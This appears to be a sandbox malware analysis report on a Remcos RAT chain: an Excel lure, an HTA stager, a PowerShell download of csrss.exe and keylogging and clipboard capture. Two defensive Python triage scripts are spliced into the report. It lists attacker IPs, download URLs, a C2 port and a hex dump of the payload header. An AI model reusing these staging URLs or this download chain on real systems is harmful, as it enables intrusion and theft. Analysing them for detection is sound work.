            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.173.143.46:80
            Source: global trafficTCP traffic: 107.173.143.46:80 -> 192.168.2.22:49167

            Networking

            Source: Malware configuration extractor | URLs: unifrieghtmovers.com
            Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 23.95.60.82:2558
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 07:30:07 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28Last-Modified: Fri, 26 Jul 2024 06:04:08 GMTETag: "28ca00-61e204785c600"Accept-Ranges: bytesContent-Length: 2673152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 0f d7 18 24 6e b9 4b 24 6e b9 4b 24 6e b9 4b e7 ed ba 4a 2d 6e b9 4b e7 ed bd 4a 28 6e b9 4b e7 ed bc 4a 0a 6e b9 4b 2d 16 2a 4b 2a 6e b9 4b 6f 16 b8 4a 2d 6e b9 4b 24 6e b8 4b dc 6e b9 4b e5 12 ba 4a 2f 6e b9 4b e5 12 bc 4a 60 6e b9 4b 24 6e b9 4b 25 6e b9 4b 37 ea b9 4a 25 6e b9 4b 37 ea 46 4b 25 6e b9 4b 37 ea bb 4a 25 6e b9 4b 52 69 63 68 24 6e b9 4b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 6d d0 a2 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 84 13 00 00 42 15 00 00 f8 05 00 c0 8e 06 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2f 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 dd 25 00 58 00 00 00 48 de 25 00 dc 00 00 00 00 30 28 00 a0 93 07 00 00 f0 26 00 d8 38 01 00 00 00 00 00 00 00 00 00 00 d0 2f 00 3c 06 00 00 50 fd 22 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ff 22 00 28 00 00 00 10 fc 22 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 19 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 10 07 00 00 10 00 00 00 12 07 00 00 04 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 6d 61 6e 61 67 65 64 b8 71 0c 00 00 30 07 00 00 72 0c 00 00 16 07 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 68 79 64 72 61 74 65 64 60 f7 05 00 00 b0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 26 48 0c 00 00 b0 19 00 00 4a 0c 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 e9 00 00 00 00 26 00 00 22 00 00 00 d2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 d8 38 01 00 00 f0 26 00 00 3a 01 00 00 f4 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 93 07 00 00 30 28 00 00 94 07 00 00 2e 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 06 00 00 00 d0 2f 00 00 08 00 00 00 c2 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
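The response above deserves a second look: the server declares `Content-Type: application/lnk`, yet the Data Raw dump begins with `MZ`, a DOS stub and a `PE\0\0` signature, and the Apache ETag `28ca00-...` already encodes the 2673152-byte Content-Length. The Python below is an added example, not part of the Joe Sandbox report: it embeds the first 0x348 bytes of that dump (DOS header through section table, transcribed from the line above), walks the PE headers with `struct`, and compares the declared type with what the bytes are. The LNK magic check, the machine/subsystem name tables and the toolchain hint drawn from section names are the example's own assumptions, not findings the report states.

```python
"""PE header check on the body Joe Sandbox captured from 107.173.143.46.
Added example, not part of the report; header bytes transcribed from the report's Data Raw dump."""
import struct
from datetime import datetime, timezone

# Response headers as logged by the sandbox; the body was served as application/lnk.
RESPONSE_HEADERS = {"Content-Type": "application/lnk", "Content-Length": "2673152",
                    "ETag": '"28ca00-61e204785c600"'}

# First 0x348 bytes of the body (DOS header .. section table), 32 bytes per row.
BODY_PREFIX = bytes.fromhex("""
4d5a900003000000 04000000ffff0000 b800000000000000 4000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000000010000
0e1fba0e00b409cd 21b8014ccd215468 69732070726f6772 616d2063616e6e6f
742062652072756e 20696e20444f5320 6d6f64652e0d0d0a 2400000000000000
600fd718246eb94b 246eb94b246eb94b e7edba4a2d6eb94b e7edbd4a286eb94b
e7edbc4a0a6eb94b 2d162a4b2a6eb94b 6f16b84a2d6eb94b 246eb84bdc6eb94b
e512ba4a2f6eb94b e512bc4a606eb94b 246eb94b256eb94b 37eab94a256eb94b
37ea464b256eb94b 37eabb4a256eb94b 52696368246eb94b 0000000000000000
5045000064860800 6dd0a26600000000 00000000f0002200 0b020e2800841300
0042150000f80500 c08e060000100000 0000004001000000 0010000000020000
0600000000000000 0600000000000000 00e02f0000040000 0000000002006081
0000100000000000 0010000000000000 0000100000000000 0010000000000000
0000000010000000 f0dd250058000000 48de2500dc000000 00302800a0930700
00f02600d8380100 0000000000000000 00d02f003c060000 50fd220054000000
0000000000000000 0000000000000000 80ff220028000000 10fc220040010000
0000000000000000 00b0190030070000 0000000000000000 0000000000000000
0000000000000000 2e74657874000000 6810070000100000 0012070000040000
0000000000000000 0000000020000060 2e6d616e61676564 b8710c0000300700
00720c0000160700 0000000000000000 0000000020000060 6879647261746564
60f7050000b01300 0000000000000000 0000000000000000 00000000800000c0
2e72646174610000 26480c0000b01900 004a0c0000881300 0000000000000000
0000000040000040 2e64617461000000 10e9000000002600 0022000000d21f00
0000000000000000 00000000400000c0 2e70646174610000 d838010000f02600
003a010000f41f00 0000000000000000 0000000040000040 2e72737263000000
a093070000302800 00940700002e2100 0000000000000000 0000000040000040
2e72656c6f630000 3c06000000d02f00 0008000000c22800 0000000000000000
0000000040000042
""")

PE_TYPE = "application/vnd.microsoft.portable-executable"
MACHINES = {0x14C: "i386", 0x8664: "AMD64", 0xAA64: "ARM64"}      # example's own table
SUBSYSTEMS = {2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046

def sniff_body(body: bytes) -> str:
    """Label the body by magic bytes, independent of what Content-Type claims."""
    if body[:2] == b"MZ":
        return PE_TYPE
    if body[:4] == b"\x4c\x00\x00\x00" and body[4:20] == LNK_CLSID:
        return "application/lnk"  # a genuine Shell Link: header size 0x4C, then the LNK CLSID
    return "application/octet-stream"

def parse_pe_header(body: bytes) -> dict:
    """Walk DOS header -> COFF file header -> PE32+ optional header -> section table."""
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, nsec, stamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", body, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", body, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    subsystem, dll_chars = struct.unpack_from("<HH", body, opt + 68)
    ndirs = struct.unpack_from("<I", body, opt + 108)[0]
    dirs = [struct.unpack_from("<II", body, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", body, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_ptr": rptr, "raw_size": rsize, "characteristics": sc})
    names = {s["name"] for s in sections}
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "number_of_sections": nsec,
        "timestamp_utc": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "subsystem": SUBSYSTEMS.get(subsystem, subsystem),
        "dll_characteristics": dll_chars,
        "clr_header": dirs[14] if ndirs > 14 else (0, 0),   # (0, 0): no IL metadata directory
        "sections": sections,
        # '.managed' and 'hydrated' are the section names .NET NativeAOT (ILCompiler) emits;
        # treating them as a toolchain hint is this example's inference.
        "native_aot_hint": {".managed", "hydrated"} <= names,
    }

def analyze_response(headers: dict, body: bytes) -> dict:
    """Compare declared Content-Type with the sniffed body; for a PE, check for an appended overlay."""
    declared = headers.get("Content-Type", "").split(";")[0].strip().lower()
    sniffed = sniff_body(body)
    result = {"declared_type": declared, "sniffed_type": sniffed, "mismatch": declared != sniffed}
    if sniffed == PE_TYPE:
        pe = parse_pe_header(body)
        end = max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])
        result.update(pe=pe, end_of_last_section=end,
                      overlay_bytes=int(headers["Content-Length"]) - end)
    return result
```

`analyze_response(RESPONSE_HEADERS, BODY_PREFIX)` reports an AMD64 PE32+ GUI image with eight sections, an empty CLR directory, `DllCharacteristics` 0x8160 (high-entropy VA, dynamic base, NX compatible), a link timestamp of 2024-07-25 22:23:41 UTC (under eight hours before the Last-Modified header), and a last section (`.reloc`) ending at byte 2673152, exactly the Content-Length, so nothing is appended after the image. The `.managed` and `hydrated` section names match what .NET NativeAOT produces; that is an inference from the example's table, not a statement in the report.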
            Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
            Source: Joe Sandbox View | IP Address: 188.114.96.3
            Source: global traffic | HTTP traffic detected: GET /jjJsPX HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: tny.wtf | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 91.92.245.100 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /jjJsPX HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: tny.wtf | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Range: bytes=8895- | Connection: Keep-Alive | Host: 91.92.245.100 | If-Range: "25ddd-61e14da080a28"
            Source: global traffic | HTTP traffic detected: GET /T2507F/csrss.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 107.173.143.46 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /jjJsPX HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: tny.wtf | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /jjJsPX HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: tny.wtf | Connection: Keep-Alive
            Source: unknown | TCP traffic detected without corresponding DNS query: 91.92.245.100 (50 hits)
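Read together, the request lines above and the "no corresponding DNS query" hits describe a stager chain: a tny.wtf shortener hop, an .hta fetched twice from 91.92.245.100 (the second time resumed with Range/If-Range), csrss.exe pulled from 107.173.143.46, and a geoplugin.net/json.gp lookup once the payload runs. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds the five distinct logged requests with their header line breaks restored (the report flattens them), parses them, and applies rules that encode those observations so the same logic could run over proxy logs. The rule labels (WinINet/urlmon client, Remcos check-in) are the example's interpretation; the ETag decoding assumes Apache's default size-mtime format, which the logged response confirms (ETag 28ca00-61e204785c600 against Content-Length 2673152 and Last-Modified 26 Jul 2024 06:04:08), and applying it to the If-Range value is the example's own inference.

```python
"""Rule-based triage of the HTTP requests Joe Sandbox logged for this sample.
Added example, not part of the report; the requests are the report's own, with CRLFs restored."""
import ipaddress
from datetime import datetime, timezone

# The IE7-compatibility User-Agent carried by every WinINet request in the report.
UA_IE7 = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
          ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
          "Media Center PC 6.0; .NET4.0C; .NET4.0E)")

# The five distinct requests, in report order. The report runs header lines together,
# so the CRLFs here were restored by hand.
LOGGED_REQUESTS = [
    f"GET /jjJsPX HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\n"
    f"User-Agent: {UA_IE7}\r\nHost: tny.wtf\r\nConnection: Keep-Alive\r\n\r\n",
    f"GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
    f"Accept-Encoding: gzip, deflate\r\nUser-Agent: {UA_IE7}\r\nHost: 91.92.245.100\r\n"
    f"Connection: Keep-Alive\r\n\r\n",
    f"GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-US\r\n"
    f"UA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: {UA_IE7}\r\n"
    f"Range: bytes=8895-\r\nConnection: Keep-Alive\r\nHost: 91.92.245.100\r\n"
    'If-Range: "25ddd-61e14da080a28"\r\n\r\n',
    f"GET /T2507F/csrss.exe HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
    f"Accept-Encoding: g zip, deflate\r\nUser-Agent: {UA_IE7}\r\nHost: 107.173.143.46\r\n"
    .replace("g zip", "gzip") + "Connection: Keep-Alive\r\n\r\n",
    "GET /json.gp HTTP/1.1\r\nHost: geoplugin.net\r\nCache-Control: no-cache\r\n\r\n",
]

def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}

def is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IP, i.e. the client needed no DNS lookup."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0] if host.count(":") == 1 else host)
        return True
    except ValueError:
        return False

def decode_apache_etag(etag: str) -> tuple:
    """Apache 'FileETag MTime Size' form: "<size hex>-<mtime in microseconds, hex>".
    Confirmed by the logged response: 28ca00 = 2673152 = Content-Length and
    61e204785c600 us = 2024-07-26 06:04:08 UTC = Last-Modified."""
    size_hex, mtime_hex = etag.strip('"').split("-")
    mtime = datetime.fromtimestamp(int(mtime_hex, 16) // 1_000_000, tz=timezone.utc)
    return int(size_hex, 16), mtime.strftime("%Y-%m-%dT%H:%M:%SZ")

def triage(raw: str) -> dict:
    """Apply the rules the report's findings imply to one request; return host, path, findings."""
    req = parse_request(raw)
    h, path = req["headers"], req["path"]
    host = h.get("host", "")
    findings = []
    if is_ip_literal(host):
        findings.append("direct-to-IP Host header: hard-coded stager URL, no DNS query to correlate")
    if path.lower().endswith(".hta"):
        findings.append("HTA download: script stager for mshta.exe")
    if path.lower().endswith(".exe"):
        findings.append("executable download: second-stage payload")
    if "MSIE 7.0" in h.get("user-agent", "") and "ua-cpu" in h:
        findings.append("IE7-compatibility UA with UA-CPU: WinINet/urlmon client "
                        "(mshta.exe, URLDownloadToFile), not a current browser")
    if "range" in h:
        findings.append(f"resumed partial download ({h['range']})")
        if "if-range" in h:
            size, mtime = decode_apache_etag(h["if-range"])
            findings.append(f"If-Range ETag decodes to size={size} bytes, mtime={mtime}")
    if host == "geoplugin.net" and path == "/json.gp":
        findings.append("geoplugin.net/json.gp lookup: Remcos geolocation check-in")
    return {"host": host, "path": path, "findings": findings}

def triage_all(raws=LOGGED_REQUESTS) -> list:
    """Triage every logged request in order."""
    return [triage(r) for r in raws]
```

Decoding the If-Range ETag puts gdfvr.hta at 155101 bytes with a server mtime of 2024-07-25 16:26:06 UTC, large for an HTA and about six hours before the csrss.exe link time, which is the kind of detail worth recording as an indicator alongside the URLs themselves.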
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_000007FE899F7018 URLDownloadToFileW,7_2_000007FE899F7018
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\379F14B3.emf
            Source: powershell.exe, 00000007.00000002.455975386.000000001C440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: tny.wtf
            Source: global trafficDNS traffic detected: DNS query: unifrieghtmovers.com
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 25_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 25_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 25_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 25_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
            Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

            E-Banking Fraud

            Source: Yara match | File source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3660, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR

            System Summary

            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Quotation.xls | OLE: Microsoft Excel 2007+
            Source: ~DF91B6A489623540E3.TMP.0.dr | OLE: Microsoft Excel 2007+
            Source: 37330000.0.dr | OLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\winiti.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 770B0000 page execute and read and write
